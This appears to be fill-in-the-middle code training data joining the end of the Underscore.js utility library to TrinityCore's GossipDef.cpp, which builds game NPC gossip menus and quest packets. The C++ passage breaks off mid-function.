size++; // Deep compare each member. if (!(result = _.has(b, key) && eq(a[key], b[key], aStack, bStack))) break; } } // Ensure that both objects contain the same number of properties. if (result) { for (key in b) { if (_.has(b, key) && !(size--)) break; } result = !size; } } // Remove the first object from the stack of traversed objects. aStack.pop(); bStack.pop(); return result; }; // Perform a deep comparison to check if two objects are equal. _.isEqual = function(a, b) { return eq(a, b, [], []); }; // Is a given array, string, or object empty? // An "empty" object has no enumerable own-properties. _.isEmpty = function(obj) { if (obj == null) return true; if (_.isArray(obj) || _.isString(obj)) return obj.length === 0; for (var key in obj) if (_.has(obj, key)) return false; return true; }; // Is a given value a DOM element? _.isElement = function(obj) { return !!(obj && obj.nodeType === 1); }; // Is a given value an array? // Delegates to ECMA5's native Array.isArray _.isArray = nativeIsArray || function(obj) { return toString.call(obj) == '[object Array]'; }; // Is a given variable an object? _.isObject = function(obj) { return obj === Object(obj); }; // Add some isType methods: isArguments, isFunction, isString, isNumber, isDate, isRegExp. each(['Arguments', 'Function', 'String', 'Number', 'Date', 'RegExp'], function(name) { _['is' + name] = function(obj) { return toString.call(obj) == '[object ' + name + ']'; }; }); // Define a fallback version of the method in browsers (ahem, IE), where // there isn't any inspectable "Arguments" type. if (!_.isArguments(arguments)) { _.isArguments = function(obj) { return !!(obj && _.has(obj, 'callee')); }; } // Optimize `isFunction` if appropriate. if (typeof (/./) !== 'function') { _.isFunction = function(obj) { return typeof obj === 'function'; }; } // Is a given object a finite number? _.isFinite = function(obj) { return isFinite(obj) && !isNaN(parseFloat(obj)); }; // Is the given value `NaN`? (NaN is the only number which does not equal itself). _.isNaN = function(obj) { return _.isNumber(obj) && obj != +obj; }; // Is a given value a boolean? _.isBoolean = function(obj) { return obj === true || obj === false || toString.call(obj) == '[object Boolean]'; }; // Is a given value equal to null? _.isNull = function(obj) { return obj === null; }; // Is a given variable undefined? _.isUndefined = function(obj) { return obj === void 0; }; // Shortcut function for checking if an object has a given property directly // on itself (in other words, not on a prototype). _.has = function(obj, key) { return hasOwnProperty.call(obj, key); }; // Utility Functions // ----------------- // Run Underscore.js in *noConflict* mode, returning the `_` variable to its // previous owner. Returns a reference to the Underscore object. _.noConflict = function() { root._ = previousUnderscore; return this; }; // Keep the identity function around for default iterators. _.identity = function(value) { return value; }; // Run a function **n** times. _.times = function(n, iterator, context) { var accum = Array(n); for (var i = 0; i < n; i++) accum[i] = iterator.call(context, i); return accum; }; // Return a random integer between min and max (inclusive). _.random = function(min, max) { if (max == null) { max = min; min = 0; } return min + (0 | Math.random() * (max - min + 1)); }; // List of HTML entities for escaping. var entityMap = { escape: { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' } }; entityMap.unescape = _.invert(entityMap.escape); // Regexes containing the keys and values listed immediately above. var entityRegexes = { escape: new RegExp('[' + _.keys(entityMap.escape).join('') + ']', 'g'), unescape: new RegExp('(' + _.keys(entityMap.unescape).join('|') + ')', 'g') }; // Functions for escaping and unescaping strings to/from HTML interpolation. _.each(['escape', 'unescape'], function(method) { _[method] = function(string) { if (string == null) return ''; return ('' + string).replace(entityRegexes[method], function(match) { return entityMap[method][match]; }); }; }); // If the value of the named property is a function then invoke it; // otherwise, return it. _.result = function(object, property) { if (object == null) return null; var value = object[property]; return _.isFunction(value) ? value.call(object) : value; }; // Add your own custom functions to the Underscore object. _.mixin = function(obj) { each(_.functions(obj), function(name){ var func = _[name] = obj[name]; _.prototype[name] = function() { var args = [this._wrapped]; push.apply(args, arguments); return result.call(this, func.apply(_, args)); }; }); }; // Generate a unique integer id (unique within the entire client session). // Useful for temporary DOM ids. var idCounter = 0; _.uniqueId = function(prefix) { var id = '' + ++idCounter; return prefix ? prefix + id : id; }; // By default, Underscore uses ERB-style template delimiters, change the // following template settings to use alternative delimiters. _.templateSettings = { evaluate : /<%([\s\S]+?)%>/g, interpolate : /<%=([\s\S]+?)%>/g, escape : /<%-([\s\S]+?)%>/g }; // When customizing `templateSettings`, if you don't want to define an // interpolation, evaluation or escaping regex, we need one that is // guaranteed not to match. var noMatch = /(.)^/; // Certain characters need to be escaped so that they can be put into a // string literal. var escapes = { "'": "'", '\\': '\\', '\r': 'r', '\n': 'n', '\t': 't', '\u2028': 'u2028', '\u2029': 'u2029' }; var escaper = /\\|'|\r|\n|\t|\u2028|\u2029/g; // JavaScript micro-templating, similar to John Resig's implementation. // Underscore templating handles arbitrary delimiters, preserves whitespace, // and correctly escapes quotes within interpolated code. _.template = function(text, data, settings) { settings = _.defaults({}, settings, _.templateSettings); // Combine delimiters into one regular expression via alternation. var matcher = new RegExp([ (settings.escape || noMatch).source, (settings.interpolate || noMatch).source, (settings.evaluate || noMatch).source ].join('|') + '|$', 'g'); // Compile the template source, escaping string literals appropriately. var index = 0; var source = "__p+='"; text.replace(matcher, function(match, escape, interpolate, evaluate, offset) { source += text.slice(index, offset) .replace(escaper, function(match) { return '\\' + escapes[match]; }); if (escape) { source += "'+\n((__t=(" + escape + "))==null?'':_.escape(__t))+\n'"; } if (interpolate) { source += "'+\n((__t=(" + interpolate + "))==null?'':__t)+\n'"; } if (evaluate) { source += "';\n" + evaluate + "\n__p+='"; } index = offset + match.length; return match; }); source += "';\n"; // If a variable is not specified, place data values in local scope. if (!settings.variable) source = 'with(obj||{}){\n' + source + '}\n'; source = "var __t,__p='',__j=Array.prototype.join," + "print=function(){__p+=__j.call(arguments,'');};\n" + source + "return __p;\n"; try { var render = new Function(settings.variable || 'obj', '_', source); } catch (e) { e.source = source; throw e; } if (data) return render(data, _); var template = function(data) { return render.call(this, data, _); }; // Provide the compiled function source as a convenience for precompilation. template.source = 'function(' + (settings.variable || 'obj') + '){\n' + source + '}'; return template; }; // Add a "chain" function, which will delegate to the wrapper. _.chain = function(obj) { return _(obj).chain(); }; // OOP // --------------- // If Underscore is called as a function, it returns a wrapped object that // can be used OO-style. This wrapper holds altered versions of all the // underscore functions. Wrapped objects may be chained. // Helper function to continue chaining intermediate results. var result = function(obj) { return this._chain ? _(obj).chain() : obj; }; // Add all of the Underscore functions to the wrapper object. _.mixin(_); // Add all mutator Array functions to the wrapper. each(['pop', 'push', 'reverse', 'shift', 'sort', 'splice', 'unshift'], function(name) { var method = ArrayProto[name]; _.prototype[name] = function() { var obj = this._wrapped; method.apply(obj, arguments); if ((name == 'shift' || name == 'splice') && obj.length === 0) delete obj[0]; return result.call(this, obj); }; }); // Add all accessor Array functions to the wrapper. each(['concat', 'join', 'slice'], function(name) { var method = ArrayProto[name]; _.prototype[name] = function() { return result.call(this, method.apply(this._wrapped, arguments)); }; }); _.extend(_.prototype, { // Start chaining a wrapped Underscore object. chain: function() { this._chain = true; return this; }, // Extracts the result from a wrapped and chained object. value: function() { return this._wrapped; } }); }).call(this);<|fim▁end|>
return -1; };
<|file_name|>GossipDef.cpp<|end_file_name|><|fim▁begin|>/* * Copyright (C) 2008-2012 TrinityCore <http://www.trinitycore.org/> * Copyright (C) 2005-2009 MaNGOS <http://getmangos.com/> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along * with this program. If not, see <http://www.gnu.org/licenses/>. */ #include "QuestDef.h" #include "GossipDef.h" #include "ObjectMgr.h" #include "WorldSession.h" #include "WorldPacket.h" #include "WorldSession.h" #include "Formulas.h" GossipMenu::GossipMenu() { _menuId = 0; } GossipMenu::~GossipMenu()<|fim▁hole|> void GossipMenu::AddMenuItem(int32 menuItemId, uint8 icon, std::string const& message, uint32 sender, uint32 action, std::string const& boxMessage, uint32 boxMoney, bool coded /*= false*/) { ASSERT(_menuItems.size() <= GOSSIP_MAX_MENU_ITEMS); // Find a free new id - script case if (menuItemId == -1) { menuItemId = 0; if (!_menuItems.empty()) { for (GossipMenuItemContainer::const_iterator itr = _menuItems.begin(); itr != _menuItems.end(); ++itr) { if (int32(itr->first) > menuItemId) break; menuItemId = itr->first + 1; } } } GossipMenuItem& menuItem = _menuItems[menuItemId]; menuItem.MenuItemIcon = icon; menuItem.Message = message; menuItem.IsCoded = coded; menuItem.Sender = sender; menuItem.OptionType = action; menuItem.BoxMessage = boxMessage; menuItem.BoxMoney = boxMoney; } /** * @name AddMenuItem * @brief Adds a localized gossip menu item from db by menu id and menu item id. * @param menuId Gossip menu id. * @param menuItemId Gossip menu item id. * @param sender Identifier of the current menu. * @param action Custom action given to OnGossipHello. */ void GossipMenu::AddMenuItem(uint32 menuId, uint32 menuItemId, uint32 sender, uint32 action) { /// Find items for given menu id. GossipMenuItemsMapBounds bounds = sObjectMgr->GetGossipMenuItemsMapBounds(menuId); /// Return if there are none. if (bounds.first == bounds.second) return; /// Iterate over each of them. for (GossipMenuItemsContainer::const_iterator itr = bounds.first; itr != bounds.second; ++itr) { /// Find the one with the given menu item id. if (itr->second.OptionIndex != menuItemId) continue; /// Store texts for localization. std::string strOptionText = itr->second.OptionText; std::string strBoxText = itr->second.BoxText; /// Check need of localization. if (GetLocale() > LOCALE_enUS) /// Find localizations from database. if (GossipMenuItemsLocale const* no = sObjectMgr->GetGossipMenuItemsLocale(MAKE_PAIR32(menuId, menuItemId))) { /// Translate texts if there are any. ObjectMgr::GetLocaleString(no->OptionText, GetLocale(), strOptionText); ObjectMgr::GetLocaleString(no->BoxText, GetLocale(), strBoxText); } /// Add menu item with existing method. Menu item id -1 is also used in ADD_GOSSIP_ITEM macro. AddMenuItem(-1, itr->second.OptionIcon, strOptionText, sender, action, strBoxText, itr->second.BoxMoney, itr->second.BoxCoded); } } void GossipMenu::AddGossipMenuItemData(uint32 menuItemId, uint32 gossipActionMenuId, uint32 gossipActionPoi) { GossipMenuItemData& itemData = _menuItemData[menuItemId]; itemData.GossipActionMenuId = gossipActionMenuId; itemData.GossipActionPoi = gossipActionPoi; } uint32 GossipMenu::GetMenuItemSender(uint32 menuItemId) const { GossipMenuItemContainer::const_iterator itr = _menuItems.find(menuItemId); if (itr == _menuItems.end()) return 0; return itr->second.Sender; } uint32 GossipMenu::GetMenuItemAction(uint32 menuItemId) const { GossipMenuItemContainer::const_iterator itr = _menuItems.find(menuItemId); if (itr == _menuItems.end()) return 0; return itr->second.OptionType; } bool GossipMenu::IsMenuItemCoded(uint32 menuItemId) const { GossipMenuItemContainer::const_iterator itr = _menuItems.find(menuItemId); if (itr == _menuItems.end()) return false; return itr->second.IsCoded; } void GossipMenu::ClearMenu() { _menuItems.clear(); _menuItemData.clear(); } PlayerMenu::PlayerMenu(WorldSession* session) : _session(session) { if (_session) _gossipMenu.SetLocale(_session->GetSessionDbLocaleIndex()); } PlayerMenu::~PlayerMenu() { ClearMenus(); } void PlayerMenu::ClearMenus() { _gossipMenu.ClearMenu(); _questMenu.ClearMenu(); } void PlayerMenu::SendGossipMenu(uint32 titleTextId, uint64 objectGUID) const { WorldPacket data(SMSG_GOSSIP_MESSAGE, 100); // guess size data << uint64(objectGUID); data << uint32(_gossipMenu.GetMenuId()); // new 2.4.0 data << uint32(titleTextId); data << uint32(_gossipMenu.GetMenuItemCount()); // max count 0x10 for (GossipMenuItemContainer::const_iterator itr = _gossipMenu.GetMenuItems().begin(); itr != _gossipMenu.GetMenuItems().end(); ++itr) { GossipMenuItem const& item = itr->second; data << uint32(itr->first); data << uint8(item.MenuItemIcon); data << uint8(item.IsCoded); // makes pop up box password data << uint32(item.BoxMoney); // money required to open menu, 2.0.3 data << item.Message; // text for gossip item data << item.BoxMessage; // accept text (related to money) pop up box, 2.0.3 } data << uint32(_questMenu.GetMenuItemCount()); // max count 0x20 for (uint32 iI = 0; iI < _questMenu.GetMenuItemCount(); ++iI) { QuestMenuItem const& item = _questMenu.GetItem(iI); uint32 questID = item.QuestId; Quest const* quest = sObjectMgr->GetQuestTemplate(questID); data << uint32(questID); data << uint32(item.QuestIcon); data << int32(quest->GetQuestLevel()); data << uint32(quest->GetFlags()); // 3.3.3 quest flags data << uint8(0); // 3.3.3 changes icon: blue question or yellow exclamation std::string title = quest->GetTitle(); int locale = _session->GetSessionDbLocaleIndex(); if (locale >= 0) if (QuestLocale const* localeData = sObjectMgr->GetQuestLocale(questID)) ObjectMgr::GetLocaleString(localeData->Title, locale, title); data << title; // max 0x200 } _session->SendPacket(&data); } void PlayerMenu::SendCloseGossip() const { WorldPacket data(SMSG_GOSSIP_COMPLETE, 0); _session->SendPacket(&data); } void PlayerMenu::SendPointOfInterest(uint32 poiId) const { PointOfInterest const* poi = sObjectMgr->GetPointOfInterest(poiId); if (!poi) { sLog->outErrorDb("Request to send non-existing POI (Id: %u), ignored.", poiId); return; } std::string iconText = poi->icon_name; int32 locale = _session->GetSessionDbLocaleIndex(); if (locale >= 0) if (PointOfInterestLocale const* localeData = sObjectMgr->GetPointOfInterestLocale(poiId)) ObjectMgr::GetLocaleString(localeData->IconName, locale, iconText); WorldPacket data(SMSG_GOSSIP_POI, 4 + 4 + 4 + 4 + 4 + 10); // guess size data << uint32(poi->flags); data << float(poi->x); data << float(poi->y); data << uint32(poi->icon); data << uint32(poi->data); data << iconText; _session->SendPacket(&data); } /*********************************************************/ /*** QUEST SYSTEM ***/ /*********************************************************/ QuestMenu::QuestMenu() { _questMenuItems.reserve(16); // can be set for max from most often sizes to speedup push_back and less memory use } QuestMenu::~QuestMenu() { ClearMenu(); } void QuestMenu::AddMenuItem(uint32 QuestId, uint8 Icon) { if (!sObjectMgr->GetQuestTemplate(QuestId)) return; ASSERT(_questMenuItems.size() <= GOSSIP_MAX_MENU_ITEMS); QuestMenuItem questMenuItem; questMenuItem.QuestId = QuestId; questMenuItem.QuestIcon = Icon; _questMenuItems.push_back(questMenuItem); } bool QuestMenu::HasItem(uint32 questId) const { for (QuestMenuItemList::const_iterator i = _questMenuItems.begin(); i != _questMenuItems.end(); ++i) if (i->QuestId == questId) return true; return false; } void QuestMenu::ClearMenu() { _questMenuItems.clear(); } void PlayerMenu::SendQuestGiverQuestList(QEmote eEmote, const std::string& Title, uint64 npcGUID) { WorldPacket data(SMSG_QUESTGIVER_QUEST_LIST, 100); // guess size data << uint64(npcGUID); data << Title; data << uint32(eEmote._Delay); // player emote data << uint32(eEmote._Emote); // NPC emote size_t count_pos = data.wpos(); data << uint8 (_questMenu.GetMenuItemCount()); uint32 count = 0; for (; count < _questMenu.GetMenuItemCount(); ++count) { QuestMenuItem const& qmi = _questMenu.GetItem(count); uint32 questID = qmi.QuestId; if (Quest const* quest = sObjectMgr->GetQuestTemplate(questID)) { std::string title = quest->GetTitle(); int loc_idx = _session->GetSessionDbLocaleIndex(); if (loc_idx >= 0) if (QuestLocale const* ql = sObjectMgr->GetQuestLocale(questID)) ObjectMgr::GetLocaleString(ql->Title, loc_idx, title); data << uint32(questID); data << uint32(qmi.QuestIcon); data << int32(quest->GetQuestLevel()); data << uint32(quest->GetFlags()); // 3.3.3 quest flags data << uint8(0); // 3.3.3 changes icon: blue question or yellow exclamation data << title; } } data.put<uint8>(count_pos, count); _session->SendPacket(&data); sLog->outDebug(LOG_FILTER_NETWORKIO, "WORLD: Sent SMSG_QUESTGIVER_QUEST_LIST NPC Guid=%u", GUID_LOPART(npcGUID)); } void PlayerMenu::SendQuestGiverStatus(uint8 questStatus, uint64 npcGUID) const { WorldPacket data(SMSG_QUESTGIVER_STATUS, 9); data << uint64(npcGUID); data << uint8(questStatus); _session->SendPacket(&data); sLog->outDebug(LOG_FILTER_NETWORKIO, "WORLD: Sent SMSG_QUESTGIVER_STATUS NPC Guid=%u, status=%u", GUID_LOPART(npcGUID), questStatus); } void PlayerMenu::SendQuestGiverQuestDetails(Quest const* quest, uint64 npcGUID, bool activateAccept) const { std::string questTitle = quest->GetTitle(); std::string questDetails = quest->GetDetails(); std::string questObjectives = quest->GetObjectives(); std::string questEndText = quest->GetEndText(); int32 locale = _session->GetSessionDbLocaleIndex(); if (locale >= 0) { if (QuestLocale const* localeData = sObjectMgr->GetQuestLocale(quest->GetQuestId())) { ObjectMgr::GetLocaleString(localeData->Title, locale, questTitle); ObjectMgr::GetLocaleString(localeData->Details, locale, questDetails); ObjectMgr::GetLocaleString(localeData->Objectives, locale, questObjectives); ObjectMgr::GetLocaleString(localeData->EndText, locale, questEndText); } } WorldPacket data(SMSG_QUESTGIVER_QUEST_DETAILS, 100); // guess size data << uint64(npcGUID); data << uint64(0); // wotlk, something todo with quest sharing? data << uint32(quest->GetQuestId()); data << questTitle; data << questDetails; data << questObjectives; data << uint8(activateAccept ? 1 : 0); // auto finish data << uint32(quest->GetFlags()); // 3.3.3 questFlags data << uint32(quest->GetSuggestedPlayers()); data << uint8(0); // IsFinished? value is sent back to server in quest accept packet if (quest->HasFlag(QUEST_FLAGS_HIDDEN_REWARDS)) { data << uint32(0); // Rewarded chosen items hidden data << uint32(0); // Rewarded items hidden data << uint32(0); // Rewarded money hidden data << uint32(0); // Rewarded XP hidden } else { data << uint32(quest->GetRewChoiceItemsCount()); for (uint32 i=0; i < QUEST_REWARD_CHOICES_COUNT; ++i) { if (!quest->RewardChoiceItemId[i]) continue; data << uint32(quest->RewardChoiceItemId[i]); data << uint32(quest->RewardChoiceItemCount[i]); if (ItemTemplate const* itemTemplate = sObjectMgr->GetItemTemplate(quest->RewardChoiceItemId[i])) data << uint32(itemTemplate->DisplayInfoID); else data << uint32(0x00); } data << uint32(quest->GetRewItemsCount()); for (uint32 i=0; i < QUEST_REWARDS_COUNT; ++i) { if (!quest->RewardItemId[i]) continue; data << uint32(quest->RewardItemId[i]); data << uint32(quest->RewardItemIdCount[i]); if (ItemTemplate const* itemTemplate = sObjectMgr->GetItemTemplate(quest->RewardItemId[i])) data << uint32(itemTemplate->DisplayInfoID); else data << uint32(0); } data << uint32(quest->GetRewOrReqMoney()); data << uint32(quest->XPValue(_session->GetPlayer()) * _session->GetPlayer()->CalculateOverrideRate(RATE_OVERRIDE_XP_QUEST, sWorld->getRate(RATE_XP_QUEST))); } // rewarded honor points. Multiply with 10 to satisfy client data << 10 * Trinity::Honor::hk_honor_at_level(_session->GetPlayer()->getLevel(), quest->GetRewHonorMultiplier()); data << float(0.0f); // new 3.3.0, honor multiplier? data << uint32(quest->GetRewSpell()); // reward spell, this spell will display (icon) (casted if RewSpellCast == 0) data << int32(quest->GetRewSpellCast()); // casted spell data << uint32(quest->GetCharTitleId()); // CharTitleId, new 2.4.0, player gets this title (id from CharTitles) data << uint32(quest->GetBonusTalents()); // bonus talents data << uint32(quest->GetRewArenaPoints()); // reward arena points data << uint32(0); // unk for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) data << uint32(quest->RewardFactionId[i]); for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) data << int32(quest->RewardFactionValueId[i]); for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) data << int32(quest->RewardFactionValueIdOverride[i]); data << uint32(QUEST_EMOTE_COUNT); for (uint32 i = 0; i < QUEST_EMOTE_COUNT; ++i) { data << uint32(quest->DetailsEmote[i]); data << uint32(quest->DetailsEmoteDelay[i]); // DetailsEmoteDelay (in ms) } _session->SendPacket(&data); sLog->outDebug(LOG_FILTER_NETWORKIO, "WORLD: Sent SMSG_QUESTGIVER_QUEST_DETAILS NPCGuid=%u, questid=%u", GUID_LOPART(npcGUID), quest->GetQuestId()); } void PlayerMenu::SendQuestQueryResponse(Quest const* quest) const { std::string questTitle = quest->GetTitle(); std::string questDetails = quest->GetDetails(); std::string questObjectives = quest->GetObjectives(); std::string questEndText = quest->GetEndText(); std::string questCompletedText = quest->GetCompletedText(); std::string questObjectiveText[QUEST_OBJECTIVES_COUNT]; for (uint32 i = 0; i < QUEST_OBJECTIVES_COUNT; ++i) questObjectiveText[i] = quest->ObjectiveText[i]; int32 locale = _session->GetSessionDbLocaleIndex(); if (locale >= 0) { if (QuestLocale const* localeData = sObjectMgr->GetQuestLocale(quest->GetQuestId())) { ObjectMgr::GetLocaleString(localeData->Title, locale, questTitle); ObjectMgr::GetLocaleString(localeData->Details, locale, questDetails); ObjectMgr::GetLocaleString(localeData->Objectives, locale, questObjectives); ObjectMgr::GetLocaleString(localeData->EndText, locale, questEndText); ObjectMgr::GetLocaleString(localeData->CompletedText, locale, questCompletedText); for (int i = 0; i < QUEST_OBJECTIVES_COUNT; ++i) ObjectMgr::GetLocaleString(localeData->ObjectiveText[i], locale, questObjectiveText[i]); } } WorldPacket data(SMSG_QUEST_QUERY_RESPONSE, 100); // guess size data << uint32(quest->GetQuestId()); // quest id data << uint32(quest->GetQuestMethod()); // Accepted values: 0, 1 or 2. 0 == IsAutoComplete() (skip objectives/details) data << uint32(quest->GetQuestLevel()); // may be -1, static data, in other cases must be used dynamic level: Player::GetQuestLevel (0 is not known, but assuming this is no longer valid for quest intended for client) data << uint32(quest->GetMinLevel()); // min level data << uint32(quest->GetZoneOrSort()); // zone or sort to display in quest log data << uint32(quest->GetType()); // quest type data << uint32(quest->GetSuggestedPlayers()); // suggested players count data << uint32(quest->GetRepObjectiveFaction()); // shown in quest log as part of quest objective data << uint32(quest->GetRepObjectiveValue()); // shown in quest log as part of quest objective data << uint32(quest->GetRepObjectiveFaction2()); // shown in quest log as part of quest objective OPPOSITE faction data << uint32(quest->GetRepObjectiveValue2()); // shown in quest log as part of quest objective OPPOSITE faction data << uint32(quest->GetNextQuestInChain()); // client will request this quest from NPC, if not 0 data << uint32(quest->GetXPId()); // used for calculating rewarded experience if (quest->HasFlag(QUEST_FLAGS_HIDDEN_REWARDS)) data << uint32(0); // Hide money rewarded else data << uint32(quest->GetRewOrReqMoney()); // reward money (below max lvl) data << uint32(quest->GetRewMoneyMaxLevel()); // used in XP calculation at client data << uint32(quest->GetRewSpell()); // reward spell, this spell will display (icon) (casted if RewSpellCast == 0) data << int32(quest->GetRewSpellCast()); // casted spell // rewarded honor points data << Trinity::Honor::hk_honor_at_level(_session->GetPlayer()->getLevel(), quest->GetRewHonorMultiplier()); data << float(0); // new reward honor (multipled by ~62 at client side) data << uint32(quest->GetSrcItemId()); // source item id data << uint32(quest->GetFlags() & 0xFFFF); // quest flags data << uint32(quest->GetCharTitleId()); // CharTitleId, new 2.4.0, player gets this title (id from CharTitles) data << uint32(quest->GetPlayersSlain()); // players slain data << uint32(quest->GetBonusTalents()); // bonus talents data << uint32(quest->GetRewArenaPoints()); // bonus arena points data << uint32(0); // review rep show mask if (quest->HasFlag(QUEST_FLAGS_HIDDEN_REWARDS)) { for (uint32 i = 0; i < QUEST_REWARDS_COUNT; ++i) data << uint32(0) << uint32(0); for (uint32 i = 0; i < QUEST_REWARD_CHOICES_COUNT; ++i) data << uint32(0) << uint32(0); } else { for (uint32 i = 0; i < QUEST_REWARDS_COUNT; ++i) { data << uint32(quest->RewardItemId[i]); data << uint32(quest->RewardItemIdCount[i]); } for (uint32 i = 0; i < QUEST_REWARD_CHOICES_COUNT; ++i) { data << uint32(quest->RewardChoiceItemId[i]); data << uint32(quest->RewardChoiceItemCount[i]); } } for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) // reward factions ids data << uint32(quest->RewardFactionId[i]); for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) // columnid+1 QuestFactionReward.dbc? data << int32(quest->RewardFactionValueId[i]); for (int i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) // unk (0) data << int32(quest->RewardFactionValueIdOverride[i]); data << quest->GetPointMapId(); data << quest->GetPointX(); data << quest->GetPointY(); data << quest->GetPointOpt(); data << questTitle; data << questObjectives; data << questDetails; data << questEndText; data << questCompletedText; // display in quest objectives window once all objectives are completed for (uint32 i = 0; i < QUEST_OBJECTIVES_COUNT; ++i) { if (quest->RequiredNpcOrGo[i] < 0) data << uint32((quest->RequiredNpcOrGo[i] * (-1)) | 0x80000000); // client expects gameobject template id in form (id|0x80000000) else data << uint32(quest->RequiredNpcOrGo[i]); data << uint32(quest->RequiredNpcOrGoCount[i]); data << uint32(quest->RequiredSourceItemId[i]); data << uint32(0); // req source count? } for (uint32 i = 0; i < QUEST_ITEM_OBJECTIVES_COUNT; ++i) { data << uint32(quest->RequiredItemId[i]); data << uint32(quest->RequiredItemCount[i]); } for (uint32 i = 0; i < QUEST_OBJECTIVES_COUNT; ++i) data << questObjectiveText[i]; _session->SendPacket(&data); sLog->outDebug(LOG_FILTER_NETWORKIO, "WORLD: Sent SMSG_QUEST_QUERY_RESPONSE questid=%u", quest->GetQuestId()); } void PlayerMenu::SendQuestGiverOfferReward(Quest const* quest, uint64 npcGUID, bool enableNext) const { std::string questTitle = quest->GetTitle(); std::string questOfferRewardText = quest->GetOfferRewardText(); int locale = _session->GetSessionDbLocaleIndex(); if (locale >= 0) { if (QuestLocale const* localeData = sObjectMgr->GetQuestLocale(quest->GetQuestId())) { ObjectMgr::GetLocaleString(localeData->Title, locale, questTitle); ObjectMgr::GetLocaleString(localeData->OfferRewardText, locale, questOfferRewardText); } } WorldPacket data(SMSG_QUESTGIVER_OFFER_REWARD, 50); // guess size data << uint64(npcGUID); data << uint32(quest->GetQuestId()); data << questTitle; data << questOfferRewardText; data << uint8(enableNext ? 1 : 0); // Auto Finish data << uint32(quest->GetFlags()); // 3.3.3 questFlags data << uint32(quest->GetSuggestedPlayers()); // SuggestedGroupNum uint32 emoteCount = 0; for (uint32 i = 0; i < QUEST_EMOTE_COUNT; ++i) { if (quest->OfferRewardEmote[i] <= 0) break; ++emoteCount; } data << emoteCount; // Emote Count for (uint32 i = 0; i < emoteCount; ++i) { data << uint32(quest->OfferRewardEmoteDelay[i]); // Delay Emote data << uint32(quest->OfferRewardEmote[i]); } data << uint32(quest->GetRewChoiceItemsCount()); for (uint32 i=0; i < quest->GetRewChoiceItemsCount(); ++i) { data << uint32(quest->RewardChoiceItemId[i]); data << uint32(quest->RewardChoiceItemCount[i]); if (ItemTemplate const* itemTemplate = sObjectMgr->GetItemTemplate(quest->RewardChoiceItemId[i])) data << uint32(itemTemplate->DisplayInfoID); else data << uint32(0); } data << uint32(quest->GetRewItemsCount()); for (uint32 i = 0; i < quest->GetRewItemsCount(); ++i) { data << uint32(quest->RewardItemId[i]); data << uint32(quest->RewardItemIdCount[i]); if (ItemTemplate const* itemTemplate = sObjectMgr->GetItemTemplate(quest->RewardItemId[i])) data << uint32(itemTemplate->DisplayInfoID); else data << uint32(0); } data << uint32(quest->GetRewOrReqMoney()); data << uint32(quest->XPValue(_session->GetPlayer()) * _session->GetPlayer()->CalculateOverrideRate(RATE_OVERRIDE_XP_QUEST, sWorld->getRate(RATE_XP_QUEST))); // rewarded honor points. Multiply with 10 to satisfy client data << 10 * Trinity::Honor::hk_honor_at_level(_session->GetPlayer()->getLevel(), quest->GetRewHonorMultiplier()); data << float(0); // unk, honor multiplier? data << uint32(0x08); // unused by client? data << uint32(quest->GetRewSpell()); // reward spell, this spell will display (icon) (casted if RewSpellCast == 0) data << int32(quest->GetRewSpellCast()); // casted spell data << uint32(0); // unknown data << uint32(quest->GetBonusTalents()); // bonus talents data << uint32(quest->GetRewArenaPoints()); // arena points data << uint32(0); for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) // reward factions ids data << uint32(quest->RewardFactionId[i]); for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) // columnid in QuestFactionReward.dbc (zero based)? data << int32(quest->RewardFactionValueId[i]); for (uint32 i = 0; i < QUEST_REPUTATIONS_COUNT; ++i) // reward reputation override? data << uint32(quest->RewardFactionValueIdOverride[i]); _session->SendPacket(&data); sLog->outDebug(LOG_FILTER_NETWORKIO, "WORLD: Sent SMSG_QUESTGIVER_OFFER_REWARD NPCGuid=%u, questid=%u", GUID_LOPART(npcGUID), quest->GetQuestId()); } void PlayerMenu::SendQuestGiverRequestItems(Quest const* quest, uint64 npcGUID, bool canComplete, bool closeOnCancel) const { // We can always call to RequestItems, but this packet only goes out if there are actually // items. Otherwise, we'll skip straight to the OfferReward std::string questTitle = quest->GetTitle(); std::string requestItemsText = quest->GetRequestItemsText(); int32 locale = _session->GetSessionDbLocaleIndex(); if (locale >= 0) { if (QuestLocale const* localeData = sObjectMgr->GetQuestLocale(quest->GetQuestId())) { ObjectMgr::GetLocaleString(localeData->Title, locale, questTitle); ObjectMgr::GetLocaleString(localeData->RequestItemsText, locale, requestItemsText); } } if (!quest->GetReqItemsCount() && canComplete) { SendQuestGiverOfferReward(quest, npcGUID, true); return; } WorldPacket data(SMSG_QUESTGIVER_REQUEST_ITEMS, 50); // guess size data << uint64(npcGUID); data << uint32(quest->GetQuestId()); data << questTitle; data << requestItemsText; data << uint32(0x00); // unknown if (canComplete) data << quest->GetCompleteEmote(); else data << quest->GetIncompleteEmote(); // Close Window after cancel if (closeOnCancel) data << uint32(0x01); else data << uint32(0x00); data << uint32(quest->GetFlags()); // 3.3.3 questFlags data << uint32(quest->GetSuggestedPlayers()); // SuggestedGroupNum // Required Money data << uint32(quest->GetRewOrReqMoney() < 0 ? -quest->GetRewOrReqMoney() : 0); data << uint32(quest->GetReqItemsCount()); for (int i = 0; i < QUEST_ITEM_OBJECTIVES_COUNT; ++i) { if (!quest->RequiredItemId[i]) continue; data << uint32(quest->RequiredItemId[i]); data << uint32(quest->RequiredItemCount[i]); if (ItemTemplate const* itemTemplate = sObjectMgr->GetItemTemplate(quest->RequiredItemId[i])) data << uint32(itemTemplate->DisplayInfoID); else data << uint32(0); } if (!canComplete) data << uint32(0x00); else data << uint32(0x03); data << uint32(0x04); data << uint32(0x08); data << uint32(0x10); _session->SendPacket(&data); 